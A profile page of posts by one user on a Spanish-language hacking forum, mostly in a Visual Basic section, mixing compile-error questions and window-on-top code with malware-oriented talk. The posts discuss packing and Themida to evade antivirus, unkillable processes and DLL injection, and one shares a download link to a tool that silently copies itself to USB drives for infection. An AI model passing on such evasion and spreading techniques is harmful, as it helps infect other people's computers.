elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8
61  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 31 Julio 2007, 02:30 am
que lio ahora me da este error:

....
Que sucede??????????????????????
62  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 30 Julio 2007, 04:59 am
y mi error????????
63  Programación / Programación Visual Basic / Re: Ventana siempre sobre las demas en: 30 Julio 2007, 04:56 am
agregas 3 commandbuton y un label

Código:
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

Private Sub Command1_Click()
End
End Sub

Private Sub Command2_Click()
SetWindowPos Me.hwnd, 1, Me.ScaleLeft, _
Me.ScaleTop, Me.ScaleWidth, Me.ScaleHeight, 0
Me.Caption = "Formulario Siempre Visible Desactivado"
Label1.Caption = "Ahora si podras cualquier ventana o el escritorio"

End Sub

Private Sub Command3_Click()
SetWindowPos Me.hwnd, -1, Me.ScaleLeft, _
Me.ScaleTop, Me.ScaleWidth, Me.ScaleHeight, 0
Me.Caption = "Formulario Siempre Visible Activado"
Label1.Caption = "Intenta ver una ventana cualquiera"

End Sub

Private Sub Form_Load()
Me.Caption = "Formulario Siempre Visible Activado"
Label1.Caption = "Intenta ver una ventana cualquiera, o el escritorio"
SetWindowPos Me.hwnd, -1, Me.ScaleLeft, _
Me.ScaleTop, Me.ScaleWidth, Me.ScaleHeight, 0
End Sub

Private Sub Form_Unload(Cancel As Integer)
Cancel = True
End Sub
64  Programación / Programación Visual Basic / Re: Ventana siempre sobre las demas en: 30 Julio 2007, 04:52 am
es lo mismo.
65  Programación / Programación Visual Basic / Re: Ventana siempre sobre las demas en: 30 Julio 2007, 03:26 am
te refieres a q no se pueda minimizar?
osea como blokear la ventana algo asi como lo hacen los programas que controlan el tiempo en los cybers?
...
66  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 30 Julio 2007, 03:24 am
Gracias por tu aporte pero compilando me da este error:

...
nose porque me lo da, intente declarar ese index abajo del sub, pero igual me lo da.
espero tu ayuda.
67  Programación / Programación Visual Basic / Re: Ocultar codigo fuente en: 2 Julio 2007, 04:31 am
yo siendo tu primero lo comprimiria y luego usaria el themidia para darle mas proteccion, ya que hay programas para detectar si fueron hechos en VB, comprimidos no se detectara, ademas que cifra cierta parte del codigo para hacer a la aplicion mas segura, pero como exiten programas que detectan si fueron comprimidos ahi usaria el themidia para protegerlo mejor. a demas yo siendo tu al compilar la apliccion la compilaria a P-Code, que es mejor para estos casos
deja algun programa para comprimir el codigo fuente.. y en el themida.. dices q requiere una confi especial para q el code se mantega bien y seguro.. y desapercebible de los Avs... dinos como poder hacerlo:D
68  Programación / Programación Visual Basic / Proceso Inmortal en: 18 Junio 2007, 22:54 pm
me pregunto como hacer un proceso q no se pueda ni finilizar desde el adm. de tareas... asi como lo hace el deep freeze, sino m eqivoco esos procesos se convierten en procesos de sistema...
como puedo lograr eso???
69  Programación / Programación Visual Basic / Re: [Source] Inyeccion Dll en VB en: 18 Junio 2007, 18:05 pm
Puedes colocar el source de una DLL en VB q de un unico mensaje de HOla...
la cual al ser inyectada con este medio cuando se abra el programa infectado la DLL diga Hola! :D
70  Programación / Programación Visual Basic / Re: Detectar pen drive o USB en: 18 Junio 2007, 17:59 pm
Ya hice lo q qria
http://rapidshare.com/files/37949048/USB_infect.zip
alli esta... por si algioemn qiere probarlo y verlo..
lo unico q hace es detectar si se desconecta o conecta un USB... si se conecta se copia en ella silenciosamente...
esto seria para usarlo cmo infeccion por usb.

PD: lo encontre por mi cuenta... en este foro no estaba algo como lo q tengo.
Páginas: 1 2 3 4 5 6 [7] 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines